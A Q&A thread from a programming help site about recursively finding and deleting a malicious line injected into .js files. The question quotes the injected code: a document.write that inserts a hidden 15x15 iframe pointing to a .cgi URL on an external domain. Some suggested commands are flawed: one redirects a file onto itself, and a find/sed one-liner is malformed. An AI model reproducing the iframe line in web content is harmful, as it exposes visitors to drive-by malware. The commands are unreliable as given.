# find and delete string in all *.js files with ssh unix?

Tags: shell, unix, ssh

I'm trying to find a string in all js-files (recursively in all subfolders) and remove the string if possible and show which file was processed (so I can check it afterwards).

I was able to look for the string.

```
grep -lr --include="*.js" "antivirusesratings.ru" .
```

and with this: (not sure if there is a difference between the two methods?)

```
find ./ -type f | xargs grep -l "antivirusesratings.ru"
```

So maybe the last example can be altered so that it deletes the string too.
Now that I think about it. The string that I want to erase has quotes. No clue in how to do it for the following string which I'm really trying to remove everywhere.

```
;document.write('<iframe src="http://antivirusesratings.ru/thenautoreplies.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>')
```

Thanks in advance.
I really appreciate it!

Regards,

Gosa

Comment: why is ssh in the title? You don't reference in your problem description. Good luck.

Answer (score 0):

`ssh` can receive a command as it's last argument, so there you should provide the super-duper-command to do the cleaning.

For cleaning the files, I think it would be good to combine `find`'s `-exec` parameter with some `grep` and output redirection.

Say, for each file found, `grep -v UGLY_LINE $FILE > $FILE`, or something similar (I think you probably have to use a temporal file because of the redirection of the FILE to itself that doesn't work IIRC).

Try the `grep` with the redirection, then combine it with `find`, and finally (maybe with some little escaping) you should put it within `ssh` to do what you want.

Answer (score 0):

Here's a function that I found on unix.stackexchange.com that solves the same problem: [Deleting Lines Containing a Specified String in Different Files](https://unix.stackexchange.com/questions/17520/deleting-lines-containing-a-specified-string-in-different-files/17521#17521).

It finds all the files, using `grep`, containing a specific string (which is `antivirusesratings.ru` for you). It then pipes those results into `sed` using the `d` command (line delete) to remove the lines containing that string.

As always, make sure you backup your directory before running that script to mass-replace files.

Answer (score 0):

I think this is what you want:

```
find type -f -name "*.js" -exec sed -i 's/antivirusesratings.ru//g' {}
```

Comment: Hi, how can use your code with the following code instead of using only antivirusesratings.ru as a string to search for and delete.                   

;document.write('<iframe src="http://fictionaldomain.com/thenautoreplies.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>')